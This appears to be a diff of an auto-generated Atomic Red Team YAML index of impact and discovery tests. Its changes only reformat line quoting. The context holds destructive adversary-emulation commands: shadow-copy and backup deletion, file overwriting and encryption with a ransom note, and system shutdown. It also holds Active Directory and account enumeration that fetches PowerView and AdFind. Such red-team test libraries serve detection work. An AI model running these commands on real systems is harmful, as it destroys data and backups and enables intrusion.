@@ -47600,7 +47600,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -47744,7 +47744,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -47752,7 +47752,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -47774,21 +47774,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -48032,10 +48032,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) -' + ' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force @@ -48065,7 +48065,7 @@ impact: executor: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} -' + ' name: bash T1486: technique: 
@@ -48145,7 +48145,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -48169,10 +48169,10 @@ impact: dependencies: - description: 'Finds where gpg is located -' + ' prereq_command: 'which_gpg=`which gpg` -' + ' get_prereq_command: '' executor: name: bash @@ -48180,15 +48180,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} -' + ' cleanup_command: 'rm #{encrypted_file_path} -' + ' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -48208,10 +48208,10 @@ impact: dependencies: - description: 'Finds where 7z is located -' + ' prereq_command: 'which_7z=`which 7z` -' + ' get_prereq_command: '' executor: name: bash @@ -48226,7 +48226,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. -' + ' supported_platforms: - linux input_arguments: @@ -48253,7 +48253,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file -' + ' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` @@ -48267,14 +48267,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi -' + ' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file -' + ' supported_platforms: - linux input_arguments: 
@@ -48302,10 +48302,10 @@ impact: dependencies: - description: 'Finds where openssl is located -' + ' prereq_command: 'which_openssl=`which openssl` -' + ' get_prereq_command: '' executor: name: bash @@ -48328,10 +48328,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt -' + ' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 -' + ' T1565: technique: external_references: @@ -48982,18 +48982,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. -' + ' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'vssadmin.exe create shadow /for=c: -' + ' executor: command: 'vssadmin.exe delete shadows /all /quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -49006,7 +49006,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -49019,7 +49019,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -49050,7 +49050,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} -' + ' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -49064,7 +49064,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup 
@@ -49073,13 +49073,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. -' + ' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 -' + ' name: command_prompt elevation_required: true T1491.001: @@ -49141,7 +49141,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. -' + ' supported_platforms: - windows input_arguments: @@ -49508,7 +49508,7 @@ impact: executor: command: 'yes > /dev/null -' + ' name: bash T1565.003: technique: @@ -49726,10 +49726,10 @@ impact: executor: command: 'sc.exe stop #{service_name} -' + ' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe @@ -49748,10 +49748,10 @@ impact: executor: command: 'net.exe stop #{service_name} -' + ' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -49771,7 +49771,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} -' + ' name: command_prompt T1565.001: technique: @@ -49882,7 +49882,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -49893,14 +49893,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. -' + ' supported_platforms: - windows input_arguments: 
@@ -49911,14 +49911,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. -' + ' supported_platforms: - macos - linux @@ -49930,14 +49930,14 @@ impact: executor: command: 'shutdown -r #{timeout} -' + ' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. -' + ' supported_platforms: - macos - linux 
@@ -49949,73 +49949,73 @@ impact: executor: command: 'shutdown -h #{timeout} -' + ' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. -' + ' supported_platforms: - macos - linux executor: command: 'reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt -p -' + ' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt --reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff -' + ' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff --reboot -' + ' name: bash elevation_required: true T1565.002: 
@@ -50186,10 +50186,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) -' + ' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -50199,7 +50199,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 -' + ' name: command_prompt T1217: technique: @@ -50249,7 +50249,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - linux input_arguments: @@ -50263,14 +50263,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -50284,14 +50284,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: 
@@ -50305,7 +50305,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -50318,7 +50318,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force -' + ' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -50330,7 +50330,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks -' + ' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -50342,7 +50342,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite -' + ' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -50353,7 +50353,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites -' + ' name: command_prompt T1087.004: technique: @@ -50800,7 +50800,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -50814,7 +50814,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -50825,7 +50825,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} -' + ' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 
@@ -50843,18 +50843,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) -' + ' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} -' + ' executor: command: 'Invoke-Expression #{adrecon_path} -' + ' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -50875,14 +50875,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -50904,14 +50904,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt 
@@ -50931,14 +50931,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -50958,14 +50958,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -50974,13 +50974,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account -' + ' supported_platforms: - windows executor: command: 'net user administrator /domain -' + ' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -51003,7 +51003,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed -' + ' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -51024,7 +51024,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} -' + ' T1069.002: technique: external_references: @@ -51092,7 +51092,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name -' + ' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 
@@ -51114,7 +51114,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -51128,7 +51128,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. -' + ' supported_platforms: - windows executor: @@ -51141,7 +51141,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -51159,39 +51159,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. -' + ' - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} -' + ' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | 
@@ -51208,10 +51208,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -51301,7 +51301,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * -' + ' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -51314,17 +51314,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk -' + ' prereq_command: 'WHERE nltest.exe >NUL 2>&1 -' + ' get_prereq_command: 'echo Sorry RSAT must be installed manually -' + ' executor: command: 'nltest /domain_trusts -' + ' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -51337,26 +51337,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk -' + ' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" -' + ' - description: 'RSAT PowerShell AD admin cmdlets must be installed -' + ' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" -' + ' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" 
@@ -51381,14 +51381,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -51408,14 +51408,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -51549,7 +51549,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. -' + ' supported_platforms: - windows executor: @@ -51588,13 +51588,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system -' + ' supported_platforms: - macos - linux @@ -51700,7 +51700,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file -' + ' supported_platforms: - linux input_arguments: @@ -51714,7 +51714,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 
@@ -51733,14 +51733,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 -' + ' supported_platforms: - linux - macos @@ -51755,26 +51755,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user -' + ' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username -' + ' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely -' + ' supported_platforms: - linux input_arguments: @@ -51786,28 +51786,28 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; -' + ' get_prereq_command: 'echo "Install lastlog on the machine to run the test."; exit 1; -' + ' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups -' + ' supported_platforms: - linux - macos @@ -51820,7 +51820,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups -' + ' supported_platforms: - macos executor: @@ -51851,7 +51851,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: 
@@ -51871,26 +51871,26 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows executor: command: 'query user -' + ' name: command_prompt - name: Enumerate logged on users via PowerShell auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 description: 'Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows executor: command: 'query user -' + ' name: powershell T1069.001: technique: @@ -51934,7 +51934,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery -' + ' supported_platforms: - macos - linux @@ -52062,15 +52062,15 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install nmap on the machine to run the test."; exit 1; -' + ' executor: command: | nmap -sS #{network_range} -p #{port} @@ -52095,7 +52095,7 @@ discovery: dependencies: - description: 'NMap must be installed -' + ' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -52108,7 +52108,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python -' + ' supported_platforms: - windows input_arguments: @@ -52124,17 +52124,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' executor: command: 'python #(unknown) -i #{host_ip} -' + ' name: powershell T1135: technique: 
@@ -52198,7 +52198,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery -' + ' supported_platforms: - macos input_arguments: @@ -52216,7 +52216,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus -' + ' supported_platforms: - linux input_arguments: @@ -52232,16 +52232,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares -' + ' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -52259,7 +52259,7 @@ discovery: executor: command: 'net view \\#{computer_name} -' + ' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -52271,7 +52271,7 @@ discovery: executor: command: 'get-smbshare -' + ' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae @@ -52283,28 +52283,28 @@ discovery: executor: command: 'net share -' + ' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain -' + ' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: '"Join system to domain" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -52381,15 +52381,15 @@ discovery: dependencies: - description: 'Check if at least one of the tools are installed on the machine. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; -' + ' executor: command: | tcpdump -c 5 -nnni #{interface} @@ -52413,15 +52413,15 @@ discovery: dependencies: - description: 'Check if at least one of the tools are installed on the machine. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; -' + ' executor: command: "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n" @@ -52462,14 +52462,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -52477,7 +52477,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -52550,57 +52550,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. -' + ' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v7 -' + ' executor: command: 'cat /etc/security/pwquality.conf -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v6 -' + ' executor: command: | cat /etc/pam.d/system-auth 
@@ -52610,43 +52610,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. -' + ' supported_platforms: - linux executor: command: 'cat /etc/login.defs -' + ' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts -' + ' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts /domain -' + ' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. -' + ' supported_platforms: - macos executor: @@ -52825,7 +52825,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} 